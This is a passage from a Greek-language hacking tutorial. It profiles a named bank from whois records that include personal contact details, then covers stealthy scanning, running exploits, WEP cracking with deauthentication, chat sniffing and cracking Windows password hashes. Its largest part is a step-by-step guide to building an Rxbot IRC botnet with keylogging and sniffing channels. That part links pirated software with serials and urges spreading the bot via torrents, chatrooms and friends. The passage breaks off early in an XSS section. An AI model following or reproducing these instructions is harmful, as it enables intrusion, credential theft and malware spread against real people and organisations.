person: Kostas Vlahakisaddress: Marfin Investmentsaddress: Kifissias 225-227address: Athens 14561, Greecephone: +301 6127748fax-no: +301 6127353nic-hdl: KV138-RIPEmnt-by: AS3329-MNTsource: RIPE # Filtered

Information related to '62.103.38.112 - 62.103.38.127'

inetnum: 62.103.38.112 - 62.103.38.127netname: MARFINdescr: ATHENScountry: GRadmin-c: MH6673-RIPEtech-c: IT454-RIPEstatus: assigned PA mnt-by: OTENET-GR-MNTsource: RIPE # Filtered

person: MARFIC HELLENICaddress: ATHENSaddress: GRphone: +30-8173000mnt-by: otenet-gr-mntnic-hdl: MH6673-RIPEsource: RIPE # Filtered

person: Ioanna Tsagkaaddress: Network Operation and Management Center - NOMCaddress: OTEnet S.A.address: 109 Kifissias Ave & Sina Str. Marousiaddress: GR-15124 Athensaddress: Greece

Page 26: Greek Track

phone: +30 210 6151600fax-no: +30 210 6151900nic-hdl: IT454-RIPEsource: RIPE # Filtered

Information related to '213.5.232.80 - 213.5.232.83'

inetnum: 213.5.232.80 - 213.5.232.83netname: marfindescr: Bankcountry: GRadmin-c: AM2251-RIPEtech-c: AM2251-RIPEstatus: ASSIGNED PA mnt-by: AS8509-MNTsource: RIPE # Filtered

person: Aris Metaxwtosaddress: 45 Vas.Sofias avaddress: 10676 - Athensphone: +30-10-8170617fax-no: +30-10-6180079nic-hdl: AM2251-RIPEmnt-by: AS8509-MNTsource: RIPE # Filtered

Έτσι λοιπόν έχουμε ονόματα,τηλέφωνα,fax,τοποθεσίες και το πιο σημαντικό τα network blocks!!!Μπορούμε λοιπόν να αρχίσουμε με κάποιο tool να σκανάρουμε αυτό το εύρος των IP διευθύνσεων προκειμένου να δούμε ποιές είναι alive.

Μπορούμε επίσης να ψάξουμε με την εντολή nslookup για να εντοπίσουμε τα εσωτερικά hostnames και τις εσωτερικές IP διευθύνσεις.

Αυτό ήταν το λεγόμενο Footprinting και όπως είδαμε με την τεχνική αυτήν ανακαλύψαμε πάρα πολλά στοιχεία για τον στόχο μας.Στην ουσία φτιάξαμε ένα προφίλ της εταιρείας μας με σημαντικές και χρήσιμες πληροφορίες για αυτήν.

Page 27: Greek Track

Port Scanning Πρόκειται για μια μέθοδο στην οποία ο hacker με πρόγραμμα (κατά βάση) προσπαθεί να βρει ποια ports είναι ανοιχτά στο σύστημά του θύματος του. Αποκτώντας την πληροφορία αυτή μπορούμε να δούμε αν υπάρχουν πόρτες ανοιχτές στο σύστημά του, το τι "ακούει" σε κάθε πόρτα, καθώς και το αν πρέπει οι συγκεκριμένες πόρτες να είναι όλες ανοιχτές. Παρακάτω ακολουθεί οδηγός για την χρήση του nmap με γραφικό περιβάλλον (Zenmap).

Πρώτα ο hacker θα δηλώσει την διευθυνση του θυματος (URL ή IP) στο target box.Το command box ανανεώνεται αυτόματα.

Μετά ο hacker θα διαλέξει το profile με άλλα λόγια το είδος του scan. Ένας έξυπνος hacker θα διάλεγε ένα γρήγορο και αθόρυβο scan για να μην προκαλέσει υποψίες στο θύμα.

Page 28: Greek Track

• Τα αποτελέσματα του scan θα είναι κάπως έτσι:

Βρήκαμε αρκετές ανοιχτές ports μαζί με τις υπηρεσίες τους, παρακάτω δίνετε μια λίστα με υπηρεσίες που αντιστοιχούν στις ποιο γνωστές ports.20 FTP data (File Transfer Protocol) 21 FTP (File Transfer Protocol) 22 SSH (Secure Shell) 23 Telnet 25 SMTP (Send Mail Transfer Protocol) 43 whois 53 DNS (Domain Name Service) 68 DHCP (Dynamic Host Control Protocol) 80 HTTP (HyperText Transfer Protocol) 110 POP3 (Post Office Protocol, version 3) 137 NetBIOS-ns 138 NetBIOS-dgm 139 NetBIOS 143 IMAP (Internet Message Access Protocol) 161 SNMP (Simple Network Management Protocol) 194 IRC (Internet Relay Chat) 220 IMAP3 (Internet Message Access Protocol 3) 443 SSL (Secure Socket Layer) 445 SMB (NetBIOS over TCP) 1352 Lotus Notes 1433 Microsoft SQL Server 1521 Oracle SQL 2049 NFS (Network File System) 3306 MYSQL 4000 ICQ 5800 VNC 5900 VNC 8080 HTTP

Page 29: Greek Track

Εκτός από τις ανοιχτές ports σε ένα σύστημα ο hacker χρειάζεται να γνωρίζει και το λειτουργηκό του σύστημα, φυσικά υπαρχει τέτοια επιλογή στο nMap αλλά είναι πολύ “θορυβώδης” και μπορεί να προκαλέσει υποψίες στο θύμα, οπότε την αφήνουμε σαν τελευταία λύση. Ένας ποιο απλός τρόπος αν το θύμα μας είναι site είναι να πάρουμε ένα 404 error στα περισσότερα site αναγράφεται και η έκδοση του λειτουργηκού τους συστήματος στην σελίδα του error. Ένας απλός τρόπος να δούμε ένα 404 error είναι πληκτρολογόντας κάτι σαν αυτό(ghfhgfhfh.php) στο τέλος της διεύθυνσης. π.χ. Www.target-site.com/ghfhgfhfh.php

Αν σκοπεύεις να χρησιμοποιήσεις μια έκδοση του nMap χωρίς γραφικό περιβάλλον μπορείς να βρείς τις εντολές που θα χρειαστείς εδώ(http://nmap.org/book/man.html)

Searching for Vulnerabilites Τώρα που ο hacker γνωρίζει το λογισμικό και την έκδοση που τρέχει το θύμα του, θα χρησιμοποιήσει αυτές τις πληροφορίες για να βρει ένα exploit. Αν βρει ένα exploit θα το τρέξει έναντι του θύματος του και θα αποκτήσει τον απόλυτο έλεγχο. Αν δεν βρει κανένα exploit θα πάει σε άλλη port και θα ψάξει και θα δοκιμάσει ξανά σε άλλη υπηρεσία.

Γνωστές databases με exploits είναι:http://exploit-db.com/http://packetstormsecurity.org/http://osvdb.org/

0-Day: Κάθε νέα Vulnerability (ευπάθεια) που ανακαλύπτει κάποιος hacker ονομάζεται 0-day (zero day). Οι 0-day Vulnerabilites έχουν μεγάλη σημασία στην κοινότητα των hacker γιατί μια τέτοια ευπάθεια μπορεί να χρησιμοποιηθεί ενάντια σε εκατοντάδες site πριν την διορθώσουν.

Οι ποιο κοινές επιθέσεις ενάντια σε vulnerabilites είναι:

1. Denial Of Service (DoS) μια τέτοια επίθεση έχει ως σκοπό να υπερφορτώσει τόσο πολύ το σύστημα-στόχο καταναλώνοντας μνήμη και bandwidth έτσι ώστε να μην είναι σε θέση πλέον να εξυπηρετήσει τους κανονικούς χρήστες του. Αυτό επιτυγχάνεται μέσω της αποστολής πακέτων δεδομένων (data packets) σε υπερβολικά μεγάλο ρυθμό έτσι ώστε το σύστημα-στόχος να αδυνατεί να τα επεξεργαστεί με αποτέλεσμα τις περισσότερες φορές να πρέπει να γίνει επανεκκίνηση (reboot).

Page 30: Greek Track

2. Buffer Overflow (BoF) Κατά την επίθεση με υπερχείλιση προσωρινής μνήμης οι hacker εισβάλουν σε συστήματα χωρίς να χρειάζεται να κάνουν login. Χρησιμοποιούν ένα πρόγραμμα που ήδη υπάρχει στον υπολογιστή και τρέχει στο σύστημα και του δίνουν να εκτελέσει ένα κομμάτι εντολών. Το πετυχαίνουν αυτό, φτιάχνοντας ένα μεγάλο τμήμα από χαρακτήρες που περιέχει τις εντολές που θέλουν να εκτελεστούν και το εισάγουν σαν παράμετρο εισόδου στο πρόγραμμα. Κανονικά το πρόγραμμα δεν εκτελεί τον κώδικα που περνά σαν παράμετρος, αν όμως το μήκος του κειμένου είναι μεγαλύτερο από το μήκος που έχει δοθεί σαν χώρος (buffer) για το πέρασμα της παραμέτρου, τότε μέρος του περνά στον χώρο του εκτελέσιμου προγράμματος. Ο χώρος για τα δεδομένα εισόδου των προγραμμάτων βρίσκεται επάνω από τον χώρο που λέγεται process stack, που είναι το τμήμα της μνήμης που το πρόγραμμα κρατά τα δεδομένα και τον κώδικα για τον χειρισμό αυτών των δεδομένων. Κάθε φορά που το πρόγραμμα εκτελεί μια λειτουργία (function) για να επιστρέψει στο αρχικό σημείο, βρίσκει τη διεύθυνση που πρέπει να επιστρέψει στο χώρο του prοcess stack με αποτέλεσμα να εκτελεστεί ο κώδικας σε αυτή την περιοχή και μάλιστα με ό,τι προνόμια έχει το πρόγραμμα (θα μπορούσε δηλαδή να είναι προνόμια root access).

3. Local Exploit Όταν ένα exploit εφαρμόζεται Local, έχει ως αποτέλεσμα την αύξηση των δικαιωμάτων του προσώπου που εκτελεί το exploit.

4. Remote Exploit Όταν ένα exploit εκτελείται remote, εκμεταλλεύεται τη αδυναμία του απομακρυσμένου συστήματος χωρίς όμως να απαιτείται κάποια προγενέστερη πρόσβαση στο σύστημα.

Penetrating – Διείσδυση Σίγουρα έχετε αναρωτηθεί, αφού ο hacker βρει το κατάλληλο exploit πως το τρέχει εναντίον του στόχου του?! Η απάντηση είναι απλή το μόνο που χρειάζεται είναι να έχει εγκατεστημένη μια έκδοση της γλώσσας που είναι γραμμένο το exploit του. Τα exploit εχουν γραφεί σε πολλές γλώσσες προγραμματισμού και για πολλά λειτουργικά. Παρακάτω ακολουθεί ένας οδηγός για ένα exploit γραμμένο σε Perl.

Page 31: Greek Track

Αρχικά θα χρειαστεί να κατεβάσεις την γλώσσα προγραμματισμού που είναι γραμμένο το exploit σου, στην περίπτωση μας είναι η Perl. Οπότε πληκτρολογούμε στο τερματικό “sudo apt-get install perl” χωρίς τα “ “. Αφού ολοκληρωθεί η εγκατάσταση θα χρειαστεί να επεξεργαστούμε το exploit ώστε να ρυθμίσουμε κάποιες λεπτομέρειες όπως η IP του στόχου μας. 'Ηρθε πλέον η ώρα να τρέξουμε το exploit, για να γίνει αυτό θα πρέπει πρώτα να αλλάξουμε την directory του τερματικού, για να πετύχουμε κάτι τέτοιο θα χρησιμοποιήσουμε την εντολή “cd /directory που έχουμε το exploit/” χωρίς τα “ ” π.χ. Cd /home/Desktop/ έπειτα θα τρέξουμε το exploit με την εντολή “perl όνομα-του-exploit.pl” χωρίς τα “ ”. Επίσης πολύ σημαντικό είναι το exploit να έχει την κατάληξη της γλώσσας που είναι γραμμένο, στην περίπτωση μας pl για την Perl.

Page 32: Greek Track

Wireless HackingWep Cracking Τρέχουμε την διανομή Backtrack. Ανοίγουμε την κονσόλα που είναι το δεύτερο εικονίδιο κάτω αριστερά. Γράφουμε iwconfig

Και στην λίστα με τα δίκτυα κοιτάμε το όνομα του ασύρματου (από τώρα και στο εξής eth1) Κλείνουμε την κονσόλα, και παμε στο πρώτο εικονίδιο κάτω αριστερά. Το ανοίγουμε, παμε τέρμα πάνω στο BackTrack, στην συνέχεια Radio Network Analysis, μετα 80211, All, και μετά στο γνωστό Kismet. Το kismet είναι ρυθμισμένο ήδη να βάλει την κάρτα σε monitor, όταν ανοίξει, δείχνει τα διαθέσιμα ασύρματα δίκτυα...Πατάμε s και στη συνέχεια c για να βάλει τα δίκτυα σε σειρά με βάση το channel που εκπέμπουν. Αν θέλετε πατήστε m για να το κάνετε να σκάσει (εμένα με εκνευρίζει ο θόρυβος που κάνει σε κάθε πακέτο).Πατάμε L (κεφαλαίο L δηλ. shift+L) για να κλειδώσει το kismet στην επιλογή που θέλουμε. Πατάμε enter και σημειώνουμε το ssid, το bssid και το channel. Πατάμε q για να βγούμε, και Q για να κλείσει το kismet.

Ανοίγουμε την κονσόλα πάλι και πληκτρολογούμε,airodump-ng eth1 --ivs -w capture --bssid ff:ff:ff:ff:ff:f1 --channel 1 και enter

όπου eth1 το όνομα που είδαμε στο iwconfig,όπου ff:ff:ff:ff:ff:f1 το bssid του στόχου που γράψαμε απο το kismet,όπου (channel) 1 το κανάλι που γράψαμε από το kismet,όπου capture το όνομα του αρχείου που αποθηκεύουμε,

Με την airodump-ng ... --ivs καταγράφουμε στο αρχειο(capture.ivs) που καθορίσαμε στην -w, τα πακέτα που "ακούμε" από το ΑP με bssid ff:ff:ff:ff:ff:f1, δηλαδή από το στόχο μας.

Για το σπάσιμο 64bit κλειδιού θέλουμε από 50k έως 200k πακέτα, και ενός 128bit κλειδιού από 200k έως 700k!!Όπως θα διαπιστώσατε, τα πακέτα είναι πολλά και ο ρυθμός μικρός. Θα αργήσουμε όπως φαίνεται. Πρέπει λοιπόν να επισπεύσουμε την διαδικασία.

Αφήνουμε ανοιχτό το airodump-ng, ανοίγουμε νέα κονσόλα και γράφουμε,

aireplay-ng eth1 -a ff:ff:ff:ff:ff:f1 --deauth 0 και enterόπου eth1 το όνομα που είδαμε στο iwconfig,όπου ff:ff:ff:ff:ff:f1 το bssid του στόχου που γράψαμε απο το kismet,

Page 33: Greek Track

με την aireplay-ng ... --deauth 0 λέμε στο AP να αποσυνδέσει όλους τους clients. Έτσι όταν ξαναπροσπαθήσουν να συνδεθούν θα δούμε τα πακέτα να ανεβαίνουν. Μπορούμε στην εντολή να πρσθέσουμε -c ff:ff:ff:ff:ff:f2 πριν το --deauth, όπου ff:ff:ff:ff:ff:f2 η mac του client (φαίνεται στο kismet), οπότε και θα αφαιρέσουμε το 0 από το τέλος.

Και πάλι όμως τα πακέτα δεν ανεβαίνουν γρήγορα, αφήστε που αν συνεχίσουμε να αποσυνδέουμε τους clients κάποιος θα καταλάβει κάτι.

Πατάμε ctrl+c για να σταματήσει το deauth. Γράφουμε,aireplay-ng eth1 -b ff:ff:ff:ff:ff:f1 -m 68 - n 68 -h ff:ff:ff:ff:ff:ff --arpreplay

όπου ff:ff:ff:ff:ff:f1 το bssid του στόχου που γράψαμε απο το kismet,

Με αυτήν κάνουμε το εξής: Προσπαθούμε να βρούμε ένα πακέτο( πιο σωστά να κάνουμε capture), το οποίο να περνά από το AP για αληθινό, προσπαθούμε δηλαδη να το ξεγελάσουμε στέλνοντας το πακέτο που πιάσαμε, ξανα και ξανα, δημιουργώντας κυκλοφορία. Κάποια στιγμη θα δείτε "(got 1 ARP requests), sent ## packets...". Τότε θα δείτε τα πακέτα στο airodump να εκτοξεύονται.Αφήστε το airplay να στέλνει πακέτα και το airodump να αποθηκεύει. Έχουμε σχεδόν τελειώσει... Ανοίγουμε άλλη μια κονσόλα και γράφουμε,aircrack-ng -f 2 -b ff:ff:ff:ff:ff:f1 -n 128 -q capture*.ivs και enter

όπου ff:ff:ff:ff:ff:f1 το bssid του στόχου που γράψαμε απο το kismet,όπου, 128 τα bit του κλειδιού (64/128/256/512),όπου capture το όνομα του αρχείου που καταγράφει το airodump,Με την airocrack-ng -f 2, ψάχνουμε στο αρχείο που αποθηκεύει το airodump για το κλειδί . Όταν το aircrack τελειώσει θα έχουμε στην οθόνη μας το κλειδί του δικτύου. Το σπάσιμο γίνεται και με άλλα linux, με τα airodump, aircrack, aireplay και kismet που τα κατεβάζετε εύκολα. Οι εντολές μπορεί να είναι διαφορετικές ανάλογα με την έκδοσή τους.Είδατε τι απλό είναι? Περάστε σε WPA λοιπόν. Το WPA είναι πολύ καλύτερη μέθοδος, με ένα passphrase αρκετά μεγάλο, όπως s1g@mhnm3vre1p0t3k@n3n45p4p4r@5 δεν νομίζω ότι θα έχετε κανένα πρόβλημα. Επιθέσεις βέβαια υπάρχουν, ίσως σε άλλο how to. Η διαδικασία είναι σχεδόν ίδια, μόνο που καταγράφουμε όλα τα πακέτα και όχι μόνο τα ivs, και ψάχνουμε με brute force και όχι με στατιστικές μεθόδους, οπότε και γίνεται αρκετά δύσκολο, αν όχι απίθανο.

Page 34: Greek Track

Packet Sniffing ονομάζεται η μέθοδος παρακολούθησης των πακέτων ενός δικτύου.Σε αυτόν τον οδηγό θα χρησιμοποιήσουμε το πρόγραμμα Wireshark. Με ένα packet sniffer ο hacker μπορεί να παρακολουθεί συνομιλίες, ή να κλέβει username και password άλλων χρηστών στο ίδιο δύκτιο. Κατεβάστε και εγκαταστήστε το Wireshark. Τρέξτε το και πατήστε την επιλογή να δείτε τις διαθέσιμες capture interfaces.

Έπειτα διαλέξτε τον στόχο σας και πατήστε start.

Σε αυτό το παράδειγμα το θύμα έχει ανοιχτό τον Windows Live Messange έτσι εμείς βλέπουμε την συνομιλία του.

Page 35: Greek Track

Windows Hacking• Κατεβάστε και εγκαταστήστε το Ophcrack, τρέξτε το Ophcrack. Κάντε κλικ στο

“Load” και μετά στο “Encrypted SAM” θα σας ανοίξει ένα νέο παράθυρο, τώρα πρέπει να βρείτε τον φάκελο όπου βρισκονται κρυπτογραφημένα οι κωδικοί των χρηστών των windows. Αυτός ο φάκελος βρισκεται μέσα στον φάκελο “system32” και ονομάζεται “config” η διαδρομή που πρέπει να ακολουθήσετε είναι “.../WINDOWS/system32/config”. Αφού επιλέξετε τον φάκελο “config” στο Ophcrack θα εμφανιστεί μια λίστα των χρηστών των windows μαζί με τους κωδικούς τους σε μορφή Hash. Σε αυτόν τον οδηγό μας ενδιαφέρει ο χρήστης “Administrator” του οποίου ο κωδικός βρίσκετε στη στήλη “NT Hash” (όπως στην εικόνα).

Μέχρι τώρα έχουμε πάρει τον κωδικό του χρήστη που μας ενδιαφέρει σε μορφή Hash, ήρθε η ώρα να “σπάσουμε” την κρυπτογράφηση hash. Αυτό μπορούμε να το κάνουμε με δύο τρόπους ήτε α) μέσω του υπολογιστή μας (δεν σας το συνιστώ λόγω της μικρής επεξεργαστικής ισχύς των προσωπικών υπολογιστών θα πάρει υπερβολικά πολύ χρόνο) ήτε β) μέσω ενός online server που η κύρια λειτουργία του είναι να “σπάει” Hash. Στον οδηγό αυτόν θα εφαρμόσουμε την δεύτερη μέθοδο, το site που θα χρησιμοποιήσουμε για να σπάσουμε τo hash ειναι το (http://www.md5decrypter.co.uk/ntlm-decrypt.aspx).

Page 36: Greek Track

(συμπληρώστε το hash στο κενό όπως την εικόνα)

Μέσα σε λίγα δευτερόλεπτα θα σας έχει δώσει τον κωδικό του χρήστη. Σε περίπτωση που δεν μπορέσει να βρει τον κωδικό μπορείτε να στείλετε το hash στον ιδιοκτήτη του site (http://www.md5decrypter.co.uk/contact-me.aspx) και να σας το σπάσει αυτός με “rainbow tables”.

Page 37: Greek Track

Malware• Το “Malware”, συντομογραφία που προκύπτει από το συνδυασμό των λέξεων

malicious software, είναι ένας συλλογικός όρος που χρησιμοποιείται γενικά για τον προσδιορισμό ιών και άλλων τύπων επιβλαβών προγραμμάτων. Αναφέρεται σε όλα τα προγράμματα που εκκινούν (συχνά επιβλαβείς) διαδικασίες, χωρίς τη συναίνεση του χρήστη.

• Τι είναι ο Ιός – Virus Είναι ένα πρόγραμμα που τρέχει στον υπολογιστή μας. Σκοπός του είναι να βλάψει το σύστημά μας, ο κάθε ιός, με τον τρόπο του. Η διαφοροποίηση εδώ με τα υπόλοιπα, είναι ότι ο ιός έχει την ιδιότητα να μεταδίδεται όπου είναι δυνατόν. Συνυπάρχει σε πολλά αρχεία, έτοιμος να μεταδoθεί σε άλλα συστήματα μέσω αυτών, αν ένα από αυτά τα αρχεία μεταφερθεί σε άλλα συστήματα, όπου και εκεί κάνει τα ίδια (αφού βέβαια προκαλέσει και κάποια ζημιά που είναι και ο στόχος του αυτός -ανάλογα τον ιό).

• Τι είναι το Trojan horse ή Backdoor Είναι ένα πρόγραμμα που τρέχει στον υπολογιστή μας, αφού το κολλήσουμε, για να ανοίξει κάποιο backdoor. Δηλαδή για να καταλάβετε, είναι σαν να ανοίγει μία πόρτα, δίνοντας πρόσβαση σε αυτόν-αυτούς που το φτιάξανε, ώστε να καταφέρουν να μπούνε στον υπολογιστή μας, μέσω αυτής της ανοιχτής πόρτας.

• Τι είναι το Worm Είναι ένα πρόγραμμα που μολύνει τους υπολογιστές που είναι συνδεμένοι σε κάποιο δίκτυο. Αν ένας υπολογιστής το έχει και συνδεθεί σε ένα δίκτυο, θα μολυνθούν και όλοι οι υπόλοιποι υπολογιστές που είναι συνδεμένοι σε αυτό.

• Τι είναι το Spyware Είναι ένα πρόγραμμα που χρησιμοποιείται για να παρακολουθεί τις δραστηριότητες του μολυσμένου υπολογιστή. Ένας υπολογιστής που έχει κολλήσει spyware, παρακολουθείται από κάποιο τρίτο άτομο και πιο συγκεκριμένα, αυτό το τρίτο άτομο μπορεί να δει πχ τι πληκτρολογούμε (για usernames και passwords σε sites), κλπ.

• Τι είναι τα Adwares Είναι τα προγράμματα που κολλάμε και πολύ απλά μας φέρνουν με ύπουλο τρόπο διαφημίσεις στον υπολογιστή μας, χωρίς την έγκρισή μας. Χρησιμοποιούν bandwidth της σύνδεσής μας στο internet, περιορίζοντάς μας σε πιο χαμηλές ταχύτητες και ξεπετάνε συνέχεια διαφημίσεις, χωρίς να μπορούμε να κάνουμε κάτι.

Page 38: Greek Track

Botnet Αρχικά ας αναφερθούμε στη botnet και στις λειτουργείες που επιτελεί. Η botnet είναι ένα δίκτυο μέσα στο οποίο είναι μαζεμένα τα bots τα οποία δημιουργούνται σε κάπιον υπολογιστή όταν αυτό εκτελέσει ένα αρχείο το οποίο είναι γραμμένο σε μια γλώσσα προγραμματισμού και έχει τη δυνατότητα να μετατρέπει τον υπολογιστή σε ζόμπι. Μετά από αυτό ο κάτοχος της botnet θα έχει τη δυνατότητα να εκτελεί όποια λειτουργία θέλει στον υπολογιστή χωρίς κανείς να το πάρει χαμπάρι.

H botnet μπορεί να χρησιμοποιηθεί για να επιτελέσει συγκεκριμένες λειτουργίες στον υπολογιστή σας όπως keyloging, να κάνει capture screen shots, να ανοίγει τη κάμερα και να βγάζει φωτογραφίες, να παίρνει cd keys, κωδικούς, να επιτελεί ddos επιθέσεις ενάντια σε άλλα δίκτυα, να τρέχει συγκεκριμένες εντολές, να ανοίγει ιστοσελίδες και γενικά με τη botnet μπορεί κανείς να κάνει οτιδήποτε θέλει και όποτε το θέλει στο θύμα του.

Ας ξεκινήσουμε λοιπόν. Αρχικά πρέπει να κάνετε εγκατάσταση έναν C compiler κάτι το οποίο είναι πολύ εύκολο

1.Kατεβάστε το Mcft Visual C 6.0 Standard editionhttp://anonym.to/?http://www.megaupload.com/?d=SUHPYZRXήhttp://anonym.to/?http://rapidshare.com/files/21861555/msc__.rar.htmlΚωδικός: itzforblitzSerial: 812-2224558

2.Τρέξτε το setup.exe και κάντε την εγκατάσταση.3.Κατεβάστε και εγκαταστήστε το Service Pack 6

http://anonym.to/?http://www.microsoft.com/downloads/details.aspx?familyid=a8494edb-2e89-4676-a16a-5c5477cb9713&displaylang=en

4.Μετά κάντε εγατάσταση το Windows Platform SDKhttp://anonym.to/?http://rapidshare.com/files/21854411/sdk.rar.htmlή

http://anonym.to/?http://www.megaupload.com/?d=YH3SS78IΚωδικός: itzforblitz

Page 39: Greek Track

Τώρα να δούμε τι ρυθμίσεις θα πρέπει να κάνετε για να κάνετε επιτυχώς τη δημιουργία του ιού/bot σας.

1.Ανοίξτε το Mcft Visual C Compiler 6.02.Πηγαίνετε στα tools-> options και κάντε κλικ στο κουμπί με τα directories3.Ανοίξτε το παραθυράκι με τα directories, σβήστε ότι έχει μέσα και βάλτε τα ακόλουθα με την σειρά που θα σας τα δώσω.

C:\PROGRAM FILES\MICROSOFT PLATFORM SDKC:\PROGRAM FILES\MICROSOFT PLATFORM SDK\INCLUDEC:\PROGRAM FILES\MICROSOFT PLATFORM SDK\LIBC:\PROGRAM FILES\MICROSOFT PLATFORM SDK\SRCC:\PROGRAM FILES\MICROSOFT PLATFORM SDK\BINC:\Program Files\Microsoft Visual Studio\VC98\INCLUDEC:\Program Files\Microsoft Visual Studio\VC98\MFC\INCLUDEC:\Program Files\Microsoft Visual Studio\VC98\ATL\INCLUDE

Ωραία μέχρι τώρα κάναμε τις ρυθμίσεις των προγραμμάτων ας ρυθμίσουμε τώρα και το bot μας.

http://anonym.to/?http://www.mediafire.com/?awmwyidzjz5ή

http://anonym.to/?http://rapidshare.com/files/21854222/botsrc7.6rx.rar.html

Page 40: Greek Track

2.Με το που θα το κατεβάσετε λογικά θα βρείτε στον φάκελο που το βάλατε να κατέβει ένα folder με όνομα: Rxbot 7.6

3.Ανοίξτε το Rxbot 7.6 φάκελο και μετά ανοίξτε το αρχείο config.h για να κάνετε τις απαραίτητες ρυθμίσεις.

Ρυθμίστε τα παρακάτω βασικά:

int port = ; //server portchar password[] = " "; //κωδικός του bot,το βάζετε ανάμεσα στα '' '' char server[] = " "; //δίκτιο irc στο οποίο θέλετε να χετε τι botnet σαςchar channel[] = "# "; //κανάλι όπου τα bots θα μπαίνουνchar chanpass[] = " "; //κωδικός καναλιού. Απαραίτητο για την δική σας ασφάλεια και των bot σαςchar exploitchan[] = "# "; // κανάλι όπου τα exploit μηνύματα θα παραχωρούνταιchar keylogchan[] = "# "; // κανάλι όπου τα keylog μηνύματα θα παραχωρούνταιchar psniffchan[] = "# "; // κανάλι όπου τα psniff μηνύματα θα παραχωρούνται

Όταν τελειώσετε με τις ρυθμίσεις σας στο config file πρέπει να προχωρήσετε στο χτίσιμο του ιού.Πώς θα το κάνετε αυτό; Εύκολο !!!

1. Σιγουρευτείτε οτι το Mcft Visual 6.0 είναι ανοιχτό

2.Επιλέξτε File -> Open Workspace

3.Κάντε browse στο Rxbot 7.6 folder και ανοίξτε το rbot.dsw αρχείο

4.Δεξί κλικ στο ''rbot files'' -> build(όπως στην εικόνα)

Page 41: Greek Track

• 5.O ιός θα είναι με όνομα Rbot.exe στο Rxbot 7.6 > Debug folder !

Είστε έτοιμοι!!!!Ο Ιός είναι έτοιμος!!! Το μόνο που έχετε να κάνετε είναι να τον δώσετε σε άλλους και να βλέπετε τα botakia να μπαίνουν ένα ένα στο irc δίκτυό σας!

Όμως δε μιλήσαμε ακόμα για τις εντολές τις οποίες περιέχουν τα bots. Δε χρειάζεται να πούμε πολλά. Υπάρχει ιστοσελίδα συγκεκριμένη με τις εντολές.

http://anonym.to/?http://rapidshare.com/files/21542921/cmands.html

Για να κατεβάσετε το mirc έτσι ώστε να μπορείτε να μπείτε στο irc δίκτιο σας:

http://mirc.com/

• Tέλος κλείνοντας με το tutorial μου θα θελα να σας πω δυο λογάκια στο πως θα μπορέσετε να προστατέψετε εσάς και τα bots σας, επίσης μερικούς τρόπους για να κάνετε τη botnet μεγαλύτερη καθώς και μερικά public δίκτια στα οποία θα μπορούσατε χωρίς να φτιάξεται ενα δικό σας να βάλετε τη botnet σας.

Για να προστατέψετε τα bots στο κανάλι όπου τα χετε θα συνιστούσα να το χετε σε secret mode. Επίσης να χει κωδικό ή αλλιώς key. Τέλος αν θέλετε και μόνο δική σας επιλογή βάζετε το κανάλι m , δηλαδή moderated, για να μη τρώει πολυ flood ο server και επιβαρύνεται άσκοπα.

Page 42: Greek Track

Όσων αφορά την εξάπλωση της botnet σας, μπορείτε να φτιάξεται torrents και να τα στείλετε σε μεγάλους trackers όπως mininova και piratebay, να στείλετε τον ιό σε chatrooms, σε φίλους, στα internet cafe, σε warez ιστοσελίδες, και πολλοί άλλοι τρόποι τους οποίους πιστεύω ότι μπορείτε και μόνοι σας να σκεφτείτε. Τέλος μερικά public δίκτια όπου θα μπορούσατε να βάλετε τη botnet σας είναι τα dalnet, undernet, efnet. Τώρα έχετε την ικανότητα να φτιάχνετε έναν από τους πιο επικίνδυνους ιούς που υπάρχουν αυτή τη στιγμή στον κόσμο των υπολογιστών!

Page 43: Greek Track

Web Hacking• Cross Site Scripting (xss)

Τον τελευταίο καιρό (2-3 χρόνια) οι επιθέσεις XSS έχουν αυξηθεί τρομακτικά, οι λόγοι είναι πολλοί, μερικοί απ' αυτούς είναι η ευκολία, η ευρεία ανάπτυξη web-based εφαρμογών, η έλλειψη φαντασίας των web developers όταν σχεδιάζουν μια εφαρμογή κ.α. Αυτό το κείμενο λέει αυτό ακριβώς που αναγράφεται στον τίτλο του, μην περιμένετε τίποτα περισσότερο. Αν και όπως θα καταλάβεται όταν φτάσετε στο τέλος του, οι XSS attacks είναι τόσο απλές μερικές φορές που υο μόνο που χρειάζεσται είναι φαντασία και δημιουργικότητα.

Τι είναι οι XSS attacks;Αρχικά ονομάζονταν CSS (Cross-Site Scripting) και αυτό που μπορούν να κάνουν είναι να επιτρέπουν σε κάποιον attacker να εισάγει (inject) κώδικα σε σελίδες που θα χρησιμοποιήσουν άλλοι χρήστες. Έτσι ίσως είναι λίγο αόριστο, θα δούμε παρακάτω τι ακριβώς εννοώ, αλλά πρίν απ' αυτό ας ξεκαθαρίσουμε κάτι.Για λόγους αποδοτικότητας και ταχύτητας κάποιο μέρος των λειτουργιών μιας ιστοσελίδας εκτελούντε στον υπολογιστή του client και όχι του server, συνήθως τέτοιες είναι απλές λειτουργίες που θα ήταν ανούσιο να εκτελούντε από τον server,αυτά όνομάζονται client side scripts και το πιο δημοφιλές είναι είναι η javascript της Netscape.

Ίσως τώρα να σκέφτεστε οτί εφόσον αυτά εκτελούντε στην πλευρά του χρήστη (client side) τότε πως μπορεί να είναι επικύνδυνα και γι' άλλους χρήστες. Σε αυτό το σημείο χρησιμοποιείτε το γνωστό μας phising, και όπως σίγουρα καταλάβατε αυτό όλο μαζί μας κάνει μία XSS επίθεση.

Τύποι XSS attacks:Υπάρχουν τρείς τύποι, αυτοί είναι:

+ Type-0Αυτό είναι περισσότερο phising παρά XSS, συγκεκριμένα στέλνεται στο θύμα ένα email με μια σελίδα attached που όταν το θύμα πατήσει στο link που του έχει σταλεί ανοίγει αυτή η σελίδα και εκτελείτε το javascript που έχει εισάγει ο attacker.

+ Type-1Η πιο κλασσική επίθεση, ο attacker βρήσκει ένα vulnerable σε XSS site και αφού γράψει κάποιο script στέλνει με spoofed email στο θύμα του ένα link από το site αλλά μαζί με το script του στο url. Όταν το θύμα πατήσει στο link εκτελείτε το αντίστοιχο script.

Page 44: Greek Track

+ Type-2Σε κάποιο site ή συνηθέστερα forum, κάποιος κάνει post ένα link για ένα site το όποιο όμως link περιέχει στο url του κώδικα που "πιάνει" τα session cookies του site/forum όποιου πατήσει πάνω του και τα στέλνει στον attacker.

Πως βρίσκουμε ένα site vulnerable se XSS?H πιο απλή μέθοδος είναι να δοκιμάσουμε σε μία HTML Form της σελίδας να εισάγουμε κάποιον javascript κώδικα, για παράδειγμα σε κάποιο form (π.χ. στο login, στο username ή στο password) εισάγουμε: <script>alert("test");</script>

